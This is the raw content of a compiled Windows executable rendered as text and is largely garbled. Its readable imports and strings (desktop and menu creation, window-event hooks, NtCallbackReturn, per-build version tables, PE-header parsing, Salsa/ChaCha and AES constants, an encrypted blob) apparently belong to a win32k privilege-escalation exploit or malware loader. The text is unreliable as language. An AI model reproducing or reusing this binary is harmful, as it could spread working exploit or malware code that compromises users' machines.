@ MEQQEP  EP@ 3PSPVuuuWjPEPj@ MmMu3PSPVuuuWjPh[@ j@ MjP_   i  3PSPuuuuujPh[@ j@ vu_U=X@  t=0@  |e Ej jP@ ] ]%<@ UV5P@ 4@ =X@  t)t$@ ;   te Ej jP@ ^] ^]%h@ U=X@  te Ej jP@ ] ]%D@ U  VW5P@ 4@ }      $@ ;   utGSh  PS@ tV   uMh@ P@ YYu  9<  h@ P@ YYu@t [WL@ _^] UESX  f;ue Ej jP@    V5P@ 4@    $@ ;   uxL   vo    uf@   tta=0@ }u {pu>   ƆL  Ȉ@ j h   h     @    Ј@ ƆL  %H@  USVW5P@ 34@ u    $@ ;     9   w  L  i  _  5d@ U
tk]@ jX  E   ;      jDjBWƇL  J  3fGBj [
u
k]@       ]    Y  QGϋ     h@  <cj j j   0Ee  @   j j6@ vu썷     EWG@j6E@ vuECU;  u,   f9u"D   uh     3ۉD  Cu
uV@ _^[] U8SVu3UW   d@  uj [ k]@ j0Ej P  E0   +E   3ۉu؍ESP$  Sj	P   t!ESEEPSjS   E    _^[] Q=0@ u     ´   3PB5YU<SVWu 3W       e e E싆   E؋   ]EEËEMԋ 0@ E   3Et߃ tE   ]h   ju@ UȋEM} jDEXj@ZEh   |     $  UuAtvEԋ]܉EEԉEu׋ tUjEPut39EEËDĉEuUԋ=0@ |u   uj u@ E_^[]U]%@ UV5P@ 4@ tdEtt^]%@ j @ E3P5@ PuPPPPh  PPh\@ P@ ju   @     Pju@ 3^] Ud@ DSVW uj4X k]@       ȋ  Qh    Q     ˉM  T{0%      Et$+e~@ ++փ ~@ PXD$|$$ȉ4  	D$$j L$\@ Yf[@ sDWPj?V@    VP@ W3WWW8@ a  d   p@   ֋   k 0@ ]@    =0@  |D$3  P   L$D$WWh  PD$(@9@ x}WWWSt$D$,Pt$,$@ xbk0@ ]@ 7Ё   vA 4@ 5@ +˃3PAtjh  0@ h   a  @ _^[]USVW5P@ 4@ .      !  L  t.}u(      @ ǆH        <   }     E;      d@    uj X k]@ <   e    +      M G<At	EuMM   |Td@  tk ]@ ]@ jPZjdYʋUU  j j jj ǆ      Ĉ@ _^[] U   SVuWU  V5P@ @ @  ,  t P@ QQD$(P  j 3|$HY@ =@ D$TD$ D$hD$DPD$L!q@ f  h  h     h   jn\$  h(#  h@  D$$v  h(#  h@  D$c  3ɉD$Q5@ QQt$,SPt$,D$@h   QPQ@ D$g  5l@ P$؅Q  SF  d   K+˃=0@ |         +Q   D$$QP      
  @ D$HD$DPf  3D$ W5@ WWt$,t$(t$$t$,h   WPW@ D$  D$  W$@ PWhs@ 5@ hj@ D$h  =0@ |0  H9  Qh  ׉  Ή  D$Ή   D$   D$    @ jjh   W   @ d@ jZ u=0@  j0YL%k]@ ]@ +ȃ v$  ʋ   QQkjjh   S   @ iD$V  VD$C  j Y3|$(D$(D$(   PSD$4   D$H   @    ȅ   D$  D$h,       ƆL  (@ j   @ jD$   jBPF    3   f$   $   Pj7@ u捾     j j7@ uh,  (@ jjh     Ĉ@ =؈@ #t,9   u$D$lP@ D$lPԈ@ SSSD$xPׅuǆ      t$|@ 33@_^[] @ j @ T@ k
0@ =0@ @ p]@ p@ r]@ @ z]@ l@ t]@ 8@ v]@ @@ x]@ T@ |5@ Y4@ |5@ U4@ x[@ 	  UQQx@ e VWP,3UZ@ fuk0@ 
Mp]@ <Z@  EPjjW@@ t%Z@  EPujW@@ UHr3_^]UQQx@ V3WP,uUZ@ fuk0@ 
Mp]@ EPj<jW@@ t%Z@   EPujW@@ UHr_^]UQQe E   @ @ X@ P@ =P@ u0.=0@ |#*uX@    E   E]USVM33.  QQEP{  h   H@ PD@ !]Wh"  j5@ ,@    3VVV<@    E      PjWh u@ VV@ jVL@ jV @ 3Ph   PPPEP܈@ Et,  VP@ h'  V@ tjdǇ      (@ j V@ Wj 5@ @ Et P@ 9t@ u#h  (@ E@E 9t@ t3C_t V\@ 5P@ d@  Z@ 9 t^[]UQV3;tF   r3MMU3@^] VHf  ֣,@ 5U  ֣@ tɬJD  ֣(@ A3  ֣ @ {'3"  ֣@ Ċ  $@ 39,@ ^U=t@     3W}A t@    Y  S3ۉ]  M  Q  U  M4teEP   (@ u0Vu@  ,@ 1@ QMPu @ ^E]P   P@ t	SSP$@ [_] |$$j X3Àt
 "d8   pf =MZ ut	NVW}@ a U  SVWh@ @   V3WP  h@ H@ P@ 3Cj	^9=@ u=|@ f95@ u|@ P@ y 3  x@ j
Zd@       ;  o  8]   = (     =Z)     =98  ty=:  tY=?  t9=B  t0@    d@      0@    d@       0@    d@      0@    d@      0@    d@      0@    d@   0@    =d@   98  t0@    5d@ f  0@    d@    M     ufE8]u2tt
50@ #  0@      0@       
   t0@       0@ 
      ;u"8]u3f9E
50@       u
38]   38]0@    jZ;u}jY;tB8]u;um9|@ t1;uaEtt0@    H0@ @0@    4E
t&tt0@    
0@ 0@ =0@ _VVT@ u Vh@ ^USWtV3tuu'  F;r^[] UVWjj
  ujzjajZjA  7 ^] UW}9}vEMMgG3_] W33t
<a|,
_Ue SVWUMSQRVW} tuuf>MZukv<>PE  u`VxtYUZ ]J3u;Et 7B
r$uR   3Z3fz3һ   Eǋ E3_^ZY[EE_UQQWUMW}EM__] Vh   j jZ{fF  f# @  f
fFF$?F^UVW3}쫋M쫫e EPEPp@ MAuEPt@ _^]UQS3V3C]9utHd0   x@ t4VEPVh%  @ M9|@ u H=t@  E US{   ]
]rCU[    [ UWE3ɿKV@@ A"r= @ @     @ P            Ou_ S@ 
@ @ @ @ @ @ @ s   s   @ 
@ [U@ u
13P?uu %@ %@ %@ %@ %@ %@ %@ % @ %$@ %(@ %,@ %0@ %4@ %8@ % @ %<@ %@@ %D@ %H@ %L@ %P@ %T@ %X@ %@ %@ %d@ %h@ %@ %@ %|@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %@ %Ĉ@ %Ȉ@ %̈@ %Ј@ %Ԉ@ %؈@ %܈@ %@ %@ % @ %@ %@ %@ %$@ %@ %@ %@ %@ %t@ %p@ %@ %@                                                                                                                                                                                                                                                                      2  B  P  \  r  z        Ƌ  ԋ        "  2  F  R    r  |      f  T        Ό             :  N    r          č  ҍ          (  8  L  Z  l  |        ފ    Њ            *  :    Ў                                                      |            J              v  p                                   2  B  P  \  r  z        Ƌ  ԋ        "  2  F  R    r  |      f  T        Ό             :  N    r          č  ҍ          (  8  L  Z  l  |        ފ    Њ            *  :    Ў            9_snwprintf  ^_stricmp  msvcrt.dll  ~WaitForSingleObject SGetExitCodeThread KTerminateThread l CreateThread  RTlsSetValue 
HeapFree  >GetCurrentThreadId  BSleep HeapAlloc CSleepEx QTlsGetValue K CreateEventA  ,SetThreadAffinityMask  HeapCreate  tVirtualProtect  SetPriorityClass  ;GetCurrentProcess 1SetThreadPriority ResumeThread  vGetModuleHandleA  OTlsAlloc  1 CloseHandle GetProcessHeap  PTlsFree DLoadLibraryA  GetSystemInfo 5IsWow64Process  KERNEL32.dll  UnhookWinEvent  ~SetWinEventHook ] CreateMenu  PostQuitMessage  AppendMenuA GSetClassLongA fSetParent ;SendMessageA  TranslateMessage   CreateWindowExA  DefWindowProcA  RegisterClassA  SetMenuInfo SetWindowLongA   GetClassLongA HSetClassLongW ShowWindow  ySetThreadDesktop   GetClassNameA PostMessageA  CSetActiveWindow SetWindowPos   DestroyWindow  DispatchMessageA  :GetMessageA P CreateDesktopA  C CloseDesktop  SystemParametersInfoW USER32.dll   NtFreeVirtualMemory _ NtAllocateVirtualMemory b NtCallbackReturn  RtlAllocateHeap GNtSetTimer  vRtlInitUnicodeString  @RtlFreeHeap  NtCreateTimer hRtlGetVersion ntdll.dll RpcStringFreeA  UuidToStringA RPCRT4.dll  memcpy  memset                                                                                                             P      ::::::::::::      #171K1_1s111111112l22253x3)4\44444!5<5[5j55555555556656B6O6\6i6w666677&7Q7v7777 9=999:,:K:t:|::::::::;
;;4;A;J;;j;{;;;;;;;<<N<Z<<p<<<<<<==1=g={==<>N>v>>>?{?? p  x  =00	11'1-1H1P1[1n1u11111/2=2h2r222222203K3U3_3w3~333334B4\44445*505I5e5k55566?6666666 77}7777778V888889'9-9G9R9t99999999999999999999: :::&:::E:S:\:o:y::::::::;-;2;8;=;C;P;m;;;;;;< <<<3<G<S<i<r<{<<<<<<<<<<<=M=^=o======>>>$>9>N>[>>>>>>>
???"?/???H????????         000(020=0G0^0h0s0}0000001J1l1111111111334 4)4=4444444445
5551575A5d5j5p5v5|5555555555555555555555 666666$6*60666<6B6H6N6T6Z66f6l6r6x6~66666666666666666666667                                                                                                                                              YLUSVW3d50   vvF~ 6f9Ou3u썵         PPPYq<\   Yw   SXL
st^t$0Cx,tP|$8@(D$4Ptt$<P;T$<w!2ff tf0|$0>ًt$8+T$4;rSCxtZGtOP  t=D$0ރ u_
t$   tJ#LQt$4  փ[W33t
<a|,
_VWSQL$<q<Txt\T$<Z $<J3t$<;t 8Br$t$<R   Z3fz3һ   D$<ǋ D$<3Y[_^Ëȭ=tw        vFz                                                                                                                                                                           Q"                                                                                     )  x                            0                                                                                            $      &                            "    (      (              @  @           0      0              @  B                       ?                                                                                                                                                      STATIC  Global\                                                     &     & 
   M & (   $ &   
  &     &         sysshadow   msctfime ui SCROLLBAR   \ B a s e N a m e d O b j e c t s \ % S      d P   8 l    d P   8 l   * d P   8 l   2 l T ( @ l   2 l X ( @ x (           C]2/ x  ( D B P C]20 x  ( D B P C]20 x  ( D B P C]20 x  ( D B P B\.0 x  ( D B P B\.0 x  ( 8 B P B\.0 x  ( 8 B P 5MhJ1   x H B P 5MhJ1   x H B P 5MhJ2   x H B P 5MhJ1   x H B P 5MhJ1   x H B P 5MhJ2   x H B P ANmV2   x P $A N ANmV2   x P $A N 7]=
4   t  C P :_?!6   t  \G T =`@$8   t  lJ W ?bB&8   t  lJ W CcC):   t  lK X ! ?   t  tK X  "<   t  tK X %<   t  t                             U  SVWh& (   V3WP( h& ( P( 3Fj	[9=& u
f9& uƣ|& P) [  & j
Z&           ;   -  = (     =Z)     =98  ty=:  tY=?  t9=B  tx&    &      x&    &      x&    &      x&    &      x&    &    t  x&    5& _  x&    =& J     ug}Eu2
tt
x&   x&      x&          tx&       x& 
      ;u }   3f9E
x&    u}   x&          }   x&    ujZ;un;u:E
tttx&    Lx&    @5x& 8=x& 0uE
ttx&    x& 
x&    3_ Vh   j jZfF  f# @  f
fFF$?F^UVjEj P( Me EPEPh( uV( YYEPl( ^UW}9}vEMMgG3_] W33t
<a|,
_Ue SVWUMSQRVW} tuuf>MZukv<>PE  u`VxtYUZ ]J3u;Et 7B
r$uR   3Z3fz3һ   Eǋ E3_^ZY[EE_ ^]%& U=&  te Ej jP) ] ]%& U  VW5&  ( }      ,( ;   utGSh  PS( tV   uMh0 P( YYu  9<  h< P( YYu@t [W& _^ UESX  f;ue Ej jP)    V5&  (    ,( ;   uxL   vo    uf@   tta=x& }u ~pu>   ƆL  ( j h   h     (    ( ƆL  %&  USVW5& 3 ( ]    ,( ;     9     L  t  j  & U tk jX  E   ;      jDjBWƇL  ( 3fGB&  uj Z
k       ]    Y  QGϋ     h@  <aj j j   0Ee  ( j   ^j j3( [u]  E   EWG@j6E( mvuE3UF;  u,   f9u"D   uh     s3D  Fu S& _^[ U8SVu3UW   &  uj [
k j0Ej P( E0   E   3ۉu؍ESP$  Sj	P   t!ESEEPSjS   E    _EEËEEx& Mԃ   3ɃMu߃ tE   ]h   ju( UȋEMEыEh   |<D@       UuKtvEԋ]܉EEԉEu׋tUjEPut39EEËDĉEuUԋ=x& |u   uj u ) E_%( UV5&  ( tdMtt^]%( j ( E3P5& PuPPPPh  PPhH P( ju   ( 
   Pju( 3^] U& DSVW uj4X
k       ȋ  Qh    Q     ˉM  Z0%      Et$
 ++փ   P`D$|$$ȉ4  	D$$j
L$T Yf sDWPj?V(    VP) W3WWW@( a  d   p@   ֋   k
x&     =x&  |D$3  P   L$D$WWh  PD$(@9) x}WWWSt$D$,Pt$,) xbkx&  BЁ   vA
& & 
˃3PMtjh  8( h   a  (( _USVW5&  ( .      !  L  t.}u(      ( ǆH        <   }     E;      &    uj X
k <   e          M G<At	EuMM   |T&  tk  jPZjdYʋUU  j j jj ǆ      ( _ U   SVuW[  V5&  ( F  ,  t P( QQD$(Pj(D$Hj P( & =( D$TD$ D$hD$DPD$L f  h  h   *
  h   jn$
  h(#  h@  D$$
  h(#  h@  D$	  3ɉD$Q5& QQt$,SPt$(D$@h   QPQ( D$f  5& P!؅P  SE  d   K
˃=x& |
        Q   D$$QP      ( D$HD$DPf  3D$ W5& WWt$,t$$t$,t$(h   WPW( D$  D$  W,( PWh 5& hj( D$g  z=x& |0  E8  Qh  ׉  Ή  D$Ή   D$   D$    =( jjh   S   ( & jZ u9x& j0YL%k  
ȃ v$  ʋ   QQkjjh   W   ( gD$V  T؅E  jD$,j P( D$(   D$(D$,   D$@   PW(    	   L$h,         ƆL  0( j   ( jD$   jBP(   3   f$   $   Pj7( u捾     j j7( uh,  0( jjh     ( =( #t,9   u$D$lP( D$lP( SSSD$xPׅuǆ      t$|( 33@ UQV3;tF   r3MMU3@^ VH֣t& 5֣d& tɬJz֣p& Ai֣h& {'3X֣& ĊGl& 39t& ^U=&     3W}A &    Y  S3ۉ]  M  Q  U  M4teEP   p& u0Vud&  t& 1d& QMPuh& ^E]P   P& t	SSPl& [] |$$j X3Àt  "d8   pf =MZ ut	NVW a ( j & \( k x& =x& &  &  &  &  &  &  & ||YxU &  & UQQ& e VWP,3U fukx&  M <  EPjjWL( t%  EPujWL( UHr3_^UQQ& V3WP,uU fukx&  M EPj<jWL( t%   EPujWL( UHr_^UQQe E   ( & d0   & ( & =& u[YHuNL=x& |A=|& u1j EPj h%  ( u&    E   EUSV33S6  QQEPh   ( PP( !]Wh"  j5& (    3VVVH(    E      PjWh VV(    jVT( jVD( 3Ph   PPPEPx( Et,  VX( h'  V(( tjdǇ      0( j V<( Wj 5&  ) Et Pt( 9& u#h  0( E@E9& t3Ct V( _5& ( 
 9 t]rCU[    [ UWE3ɿKV@ A"r=        P            Ou_ S 
       s   s    
 [U u
13P?uu %( %( %( %( %( %( %( % ( %$( %(( %,( %0( %4( %8( % ( %@( %D( %H( %L( %P( %T( %X( %( %<( %`( %( %( %( %( %|( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %( %x( %t( %) %) %( %) %) % ) %) %l( %h(                                                                                                                                                                                                                                                                                                                                                                                                                                 
  t,  b,  R,  D,         
  .  :
  P  f
  n  z
  &,    
    
    
  ,  ,  8,      /  .      T.  B.  ,  ,  ,  ,  ,  ,  ,  ,  
-  -  0-  B-  T-  b-  t-  -  -  -  -  -  -  -  -  .  .  *.                  .  .  .  .  .  p.  .      |            (  )          ~,   (            d.  t(            .  (  )          /  h(                        t,  b,  R,  D,      
     .
  :  P
  f  n
  z  &,  
    
    
    ,  ,  8,      /  .      T.  B.  ,  ,  ,  ,  ,  ,  ,  ,  
-  -  0-  B-  T-  b-  t-  -  -  -  -  -  -  -  -  .  .  *.                  .  .  .  .  .  p.  .      strcpy  memset  9_snwprintf  ^_stricmp  msvcrt.dll  ;GetCurrentProcess GetSystemInfo 5IsWow64Process  RTlsSetValue 
HeapFree  ~WaitForSingleObject >GetCurrentThreadId  BSleep HeapAlloc CSleepEx QTlsGetValue K CreateEventA  ,SetThreadAffinityMask  HeapCreate  tVirtualProtect  SetPriorityClass  1SetThreadPriority ResumeThread  vGetModuleHandleA  KTerminateThread OTlsAlloc  1 CloseHandle l CreateThread  GetProcessHeap  PTlsFree KERNEL32.dll  UnhookWinEvent  ~SetWinEventHook ] CreateMenu  PostQuitMessage  AppendMenuA GSetClassLongA fSetParent ;SendMessageA  TranslateMessage   CreateWindowExA  DefWindowProcA  RegisterClassA  SetMenuInfo SetWindowLongA   GetClassLongA HSetClassLongW ShowWindow  ySetThreadDesktop   GetClassNameA PostMessageA  CSetActiveWindow SetWindowPos   DestroyWindow  DispatchMessageA  :GetMessageA SystemParametersInfoW P CreateDesktopA  C CloseDesktop  USER32.dll  hRtlGetVersion b NtCallbackReturn  RtlAllocateHeap GNtSetTimer  vRtlInitUnicodeString  @RtlFreeHeap  NtCreateTimer ntdll.dll RpcStringFreeA  UuidToStringA RPCRT4.dll                                                                                                                                                                                                                                       22222 33333 3$3M6S6i6w6}66666666%7/7>7H7W7a7p7z7777777778"818Y8s8888888999999:; ;-;:;G;U;b;;;;;<1<V<f<~<<<=>{>>>>
?,?U?]???     0 0)0>0I0Z0`0{0000000
171=1M1{11111112E2W2222313^333334455556 6"6*656H6O66q666	77B7L7Z7k7w7777
8%8/898Q8X8z888889699999:
:#:>:C:L:e:::: ;`;;;;;;;;^<x<}<<<<<=;=v====== >
'>2>T>>>>>>???.?{???      8  !01080>0D0K0Q0X0]0d0i0p0u0|00000000000000
11)1F1Y1d1r111111111122*2=2|22222222233&3<3E3N3T3b3h3u3333334%4454W4]4c4i4u4{444444444444445
5555"5(5.545:5@5F5L5R5X5^5d5j5p5v5|5555555555555555555555 666666$660666<6B6H6N6T6Z6                                                                                                                                                                                                                                    expand 32-byte kexpand 16-byte kccƄ||ww{{
kkֱooTőP00gg}++Vb׵櫫MvvEʏ@ɉ}}YYGG
쭭AgԳ_꯯E#Srr[·uᮓ=j&&LZ66lA??~Õ\44hQ4qqsثS11b?*RǕe##F^Ý(07 /	  6$=&i''NͲuu		t,,X.4-6nnZZ[RRM;;vaַγ}{))R>q//^SShѹ    ,  @ȱy[[jjFˍپgK99rJJLLXXJυkл媪OCCMMU33fEEPPD<<x%㨨KQQ]@@?!H88p߼cwuگc!!B0 mҿĹ5&/__5DD9.WēU~~G==zdd]]
2ss``OOܣf""D~**T;
FF)Ӹk<(yާ^^

vۭ;V22dN::t
II
l$$H\]nӽשּׁCbbĨ917Ӌyy2CȋY77nmmڌdձNN੩IllVV %ϯeeʎzz鮮Gպoxxo%%Jr…$8WǴsQƗ#|ݡtt!>KKܽa
ppB>>|ĵqffHHaa_55jWWйiX':'8볘+3"iip٩ 3-"< I·UUx((PzߥY	
ڿe1BBhhAA)w–Z˰{TTֻm:,ccƥ||ww{{
kkֽooޱőT00PggΩ++V}׵bMvvʏEɉ@}}YYGG
AԳg_Eꜜ#Srr[u=&&Lj66lZ??~A̃O44h\Q4qqثs11bS*?ǕR##FeÝ^0(7 /  	$6=&''Niuu		,,Xt4.6-nnܲZZ[RR;;vMַa}))R{>//^qSSѹh    , @y[[jjԾˍFg99rKJJLLXXυJлk*OCCMM33fUEEPP<<xD%KQQ]@@?!88pHc߶wگu!!Bc 0ҿḿL&5/__ᗗ5DD.9ēWU~~==zGddȬ]]2+ss``OOܣ""Df**T~;
FF)k(<ާy^^

ۭv;22dV::tN
II
$$Hl\]ӽnCbbĦ917yy2ȋC77nYmmڷձdNNҩIllشVV %eeʯzz􎮮Goxx%%Jo…\r8$WsƗQ#ݡ|tt>!KKݽa܋
pp>>|Bqff̪HHaa£55j_WWiІX:''8+"3iiһ٩p 3-<" ·IUU((PxߥzY
e1BBhhиAAÙ)–Zw{TTm,:cƥc||ww{{
kֽkoޱoőT0P0gΩg+V}+׵b׫MvvʏEʂɉ@}}YYGG
AԳgԢ_Eꯜ#Srr[u·=&Lj&6lZ6?~A?̃O4h\4Q4qqثs1bS1*?ǕR#Fe#Ý^0(7 / 	 $6=&'Ni'Ͳuu		,Xt,4.6-nܲnZZ[RR;vM;ַaֳ}γ)R{)>/^q/SSѹh    , @ yȱ[[jԾjˍF˾gپ9rK9JJLLXXυJлkOCCMM3fU3EEPP<xD<%KQQ]@@?!8pH8c߼wگu!Bc! 0ҿḿL&5/__5DD.9ēWħU~~=zG=dȬd]]2ss``OOܣ"Df"T~;
FF)kӸ(<ާy^^

ۭv;2dV2:tN:

II
$Hl$\]ӽnӬCbĦb917yy2ȋC7nY7mڷmձdNNIlشlVV %eʯezzGoպxx%Jo%.\r.8$WsǴƗQ#ݡ|tt>!KKaܽ
pp>|B>qĵf̪fHHa£a5j_5WWiйX:''8
"3iһi٩pَ 3-<" ·IUU(Px(ߥzߌY	

eڿ1BBhиhAA)-Zw-{˰TTmֻ,:ƥcc||ww{{
ֽkkޱooTP00ΩggV}++bM櫫vvE@}}YYGG
A쭭g_E꯯#Srr[u·=Lj&&lZ66~A??Oh\44Q4qqsbS11*?RFe##^0(7 /	  $6=&Ni''Ͳuu		Xt,,4.6-ܲnnZZ[RRvM;;a}γR{))>^q//SSh    ,@  yȱ[[ԾjjFgپrK99JJLLXXJϻkO媪CCMMfU33EEPPxD<<%K㨨QQ]@@?!pH88c߼wuBc!! 0mҁL&5/__5DD.9WU~~zG==Ȭdd]]2+ss``OODf""T~**;
FF)kӸ(<y޼^^

v;dV22tN::
II
Hl$$\]½nCשּׁĦbb917yy2CnY77ڷmmd՜NNI੩شllVV %ʯeezzG鮮oպxxJo%%\r…8$WsǴQ#|tt>!KKaܽ
pp|B>>qĵ̪ffHH£aaj_55WWiйX:''8+"3һiip 3-<" IΪUUPx((zY	
eڿ1BBиhhAA)Zw–{˰TTmֻ,:cccc||||wwww{{{{kkkkoooo0000gggg++++׫vvvvʂ}}}}YYYYGGGG𭭭Ԣrrrr&&&&6666???4444qqqq1111####    ''''uuuu				,nnnnZZZZRRRR;;;;ֳ))))////SSSS        [[[[jjjj˾9999JJJJLLLLXXXX着CCCCMMMM3333EEEEPPPP<<<<QQQQ@@@@8888!!!____DDDDħ~~~~====dddd]]]]ssss````OOOO""""****FFFF^^^^



2222::::
IIII$$$$\\Ӭbbbbyyyy7777mmmmNNNNllllVVVVeeeezzzzxxxx%%%%…ttttKKKKpppp>>>>ffffHHHHaaaa5555WWWWiiiiَUUUU((((ߌ
BBBBhhhhAAAA----TTTTPQSeA~ä^':k;EXKU0 mvv̈%LOŀD5&bIZg%E]u/LFk_zmYR-!tX)iIDɎjuxyk>Xq'Of ɴ:}Jc13QESbwdk+XhHpElޔ{R#sKrW*Uf (µ/{ņ7(0#j\+ϊy iNeվb4ъĝS.4U2u9@q^Qn!>=ݖ>FMT]qoP$C@wgB谈 8[yG |B|    	H+2pNrZlV8ծ='9-6d !\hT[:.6$g WҖO aiKwZ *C"<
 	ǋ򹨶-ȩWL uݙ&r;fD4~[v)C#hc1cB@" Ƅ}$J=2m)K/0R
wlpH"dGČ?,}V3"NI8ʌ6
Ԙρ(z&ڤ?:,
xP_jbF~Tؐ^9.Â]|i-o%;ȧ}nc{;	x&Yn쨚Oen~ϼ!ٛ6oJ	|)11#?0f57NtʂАا3JAP/MvMCTMўjL,QeF^]5st.A
ZgRے3VGmaךz7Y<'5a<GzYҜ?sUy7sS[o=߆Dx>h,4$8@r%⼋I<(A
q9޳ؐVda{p2t\lHBWЧQPeA~S^':k;EXK0 Umvv̈L%OD5&bZI%gE]u/LFk_眒zmYRڃ-!tXiI)ɎDujyx>Xkq'Oᾶ f:}Jc13Q`SbEwdk
hHpXElޔ{Rs#KrWUf( µ/{ņ7ӥ(0#j\ϊy iNe;b4ĊS.4U2u
9@q^nQ!>ݖ=>ݮMFT]qoP$֗C@̞gwB谽 [8y
|GB|    	
2HprZlN8Vծ=9-6'
d\h!T[.6$:g
WґO aKwZi
"<C

ǋ򭨶-W uLݙ&r\;fD~[4)Cv#hc1ʅcB"@Ƅ $J}=2)m/K0R w+lpHdG"?,}Vؐ3"NI8ʌ
Ԙ6z(&?:,xP _jF~Tb¸ؐ9.^Â]i|-o%ϳ;}cn;{x&	YnOne~ϼ!6oJ	|)ֲ1#?*10f5Nt7ʂАا3JAP/MvCMMTߵўjL,QeF^5]tsA
.gZےRV3Gmaך7zY<'a5Gz<ҜYsU?y7sS_[o=Dxʁh>4$8,@_r%I<( A9q؜Vd{a2p\lHtWBQPA~Seä':^;kEXK0 Uvm̈v%LO*5&DbIZ%gE]/uLFk_mzRY-tX!I)iɎDujxyXk>'qᾶO f}:cJ1Q3SbEdwkHpXhEޔl{Rs#KrWUf* (/ņ{7ӥ(0#j\ϊ
y iNeվ4bĊ.4SU2u
9@q^nQ!>ݖ=>ݮMFTq]oP$֗@Cgw谽B 8[y|G
B|    	2HpZlNrV8=-6'9
d\h![T6$:.
gWҖOa wZiK
*"<C	

Ƕ-ȩWuL `&r\fD;[4~Cv)#hc1cB@"Ƅ J}$=2)mK/0
Rw
lpHG"dČ?}V,3"IN8ʌԘ6
ρz(޷&?:,xP
j~TbFؐ9.^Â]i|o-%ϳ;}nc;{&	xYnOen~!ٛoJ6	)|1?*1#05fNt7ʐЧ3JAP/MvCMTMўjL,eFQ^]5st
.AgZےR3VmGךa7zY<'a5Gz<ҜYU?sys7S[=oDxۯʁh>$8,4_@r%<(I
A9q޳؜Vd{a2plHt\BWQP~SeAä:^';kEXK U0mvv%LO&D5bIZ%gE]u/LFk_zmYR-X!tI)iDujxyk>X'qOf }:cJ13QbESwdk+pXhHElR{#srKWf*U (/µ{ӥ70(#j\+ϧy Nieվb4Ċ4S.U2ኤu
9@^qQn>!=ݮ>MF摵Tq]oP$֗齉C@gwٰB 8[yȡG ||B    	2H+plNrZV8=ծ6'9- dh!\T[$:.6g WҖOa ZiKw *<C"
 	ǋ-ȩWL uݙ&\rD;f[4~v)C#hc1Bc@" ƅ}$J=2m)K/0
Rw+lpHG"dČ?V,}"3NI8ʘ6
Ԧρ(z&?,😛
xj_TbF~.^9ß]i|o-ϳ%;}nc{;	x&nYOen~!ϼٛJ6o	)|1*1#?05ft7NʂА3اJAP/vMCMTMLj,FQe^]5st.A
ZgR3VmG֚a7zY<'5az<GYU?sys7S_[o=xDʁ>h8,4$_@r%(I<A
9q޳؜dV{ap2Ht\lBWRRRR				jjjj000066668888@@@@||||9999////4444CCCCDDDDTTTT{{{{2222####====LLLL



BBBBNNNN…ffff(((($$$$vvvv[[[[IIIImmmm%%%%rrrrddddhhhhԤ\\]]]]eeeellllppppHHHHPPPP^^^^FFFFWWWWث    
XXXXEEEE,???kkkk::::AAAAOOOOggggꗗ𴴴sssstttt""""筭55557777uuuunnnnGGGGqqqq))))ŉoooobbbbVVVV>>>>KKKKyyyy    xxxxZZZZݨ3333    1111YYYY''''____````QQQQJJJJ
----zzzzɜ;;;;MMMM**뻻<<<<SSSSaaaa++++~~~~wwww&&&&iiiiccccUUUU!!!}}}}                      @         6                                       	                   	     
                                      
      
                              $@                                        CloseHandle  CreateThread  KERNEL32.dll                                                                                                                                                                                                                                                                                                                                  6}I05hKKzSBbj}y >C8V("U
5Q4QCo#2sx^1&Dv#S Q5$c*9cHÈ nf	 d)nkI	 _/GM3xC>!JLCWAUșgQe	(ݸH*9^GIbk	+)'OY8B5<z,e}^CO}]qܣشmù1WG~k:gxPHgq.o"n׃ e 56B+6vLx|B]Iyԩ)UCXCD=O@ i;@=vm|/Vved"$*f<+ްL
I%(EBi3bA z3;=N#A<'"ڍ 9$НLDz1!!q,kW0{A ;M\47]y BuJ͵mWctD=tV!_S7Dk1:zn9
䍂VS6;Z:t^6vÎIͳdauEcek{buMR'ܲ|5C@qyc &lNR
E{eaU
cxL$rD@
H
vEE
9jE=Bxfۉ۷)㺋Dŏ&mkԸRs) _7	RD)Y
R'Ȇ|2VCIjA	4YL dA&3.2//MHpF9JXL7-KRl|b%7>.fKf
@7;lݝ6241y
V
o~\ P"/RDlm)4tC&)[S*vlt:"v. a̻R> п	UFx$.7sQ'9W+.ڧF
xPW 41h_K,ww	 )qT>!}tcL'ܨ>&AҤt4ylppd-1DK"7W}Ʌz^g?ҲPhv9]@Ig_x,1c/;\K2ZKkt$}"z!Jx+a@x; }NHS*.:up5їb֥Kg~%t0*˘s[؎b cyvOaԐRV $-v
1RK#R9Cli+N~F%tC{v+bٰl^1^[g"#ucRٜ :ݧFcMԷNПg~6Y/\a:~}CvoK&IҮd/%
Djw37҈MK-VJ8QXYEM3^h몤s2SJx1x	Q{!K= /̖
0ɖXWdcRyeX7dDadnHT dPYp6IpZ~};[tb ~]#W+'BznRD#ָoQ v5vSktdz뗃ÈIDGq.=kWM04XF  c9slg6!4ue42*d-FW!Ʌs=MGC!됈))úsO#FCpz\Srbzz҈<4ߊ_fc,rLEUS).gOGSzil0aa4ג4w1ɧmM01Q>؁ܕ aY"H\T
sʨk:ҶTaH6n'&~kA#gLW6B}S!RiF2
cߐhr1RE7~ƥ)ZW

x<rUJKk}2
Kܞ2wrVM :#!i1$C:p[8Xłx7g&r7<]M: !$NJfv
Q3];K2jccw*@=L
=bFֻIm>fui[ń] p}k>},vS-Py=%z|&ͅ?Mfh̷.nZ3Op@gVӢ ӮɈl|ۯ	l&Jrfb     5   a                   0                
 0               Y  0  Ӷ✟:KP[_|B9Bl(Ql
W?=,ۿ^ ϭ{f
 jգ߃mc$	fE'M:V<*="[i/}֚38݀g^Z#ڶ
 cxC%<E)Cm4pb:sP8PDq9mҏF>5E0s5_ ֬/~5EdcИ:arI,𛚑&TQ X2^- 2Xq楬ƚ)X>櫌%=Oq3jqO7"6xCsیTE2/R(bXµ(wBr8N*I)q}*@vv1i૊h.Gd=E8#
Icʾ L(3Y>qu4ɗv[e\]E/,˅6fK[!{@2 ZYnuƐ8a^#z"8cۉkIv٠ik5f6d\@jk}ہrÚ),[QUx^MݖޔT@S$7/1RO!>H-VxH5HT(l_
k4[ e'y/=k|E͐c5:sis
m4vHkD!M=@߻Y(sB|:\GE ¢5|$7:!Y%"13Fwr)ꁟj=KyJ-{..1~LNyW  fDosk3oǾ\t94OC2BO.Iț!(ǔ%)x!2^" 9,^0-=|XT8:nԏ3-B0<Ș:vYvR/J _ǱKN0blLʽ1bhh	cP)V9d3g~s9E
lPG53S46!<ovG[olFnG	Зw?kX JV?8u
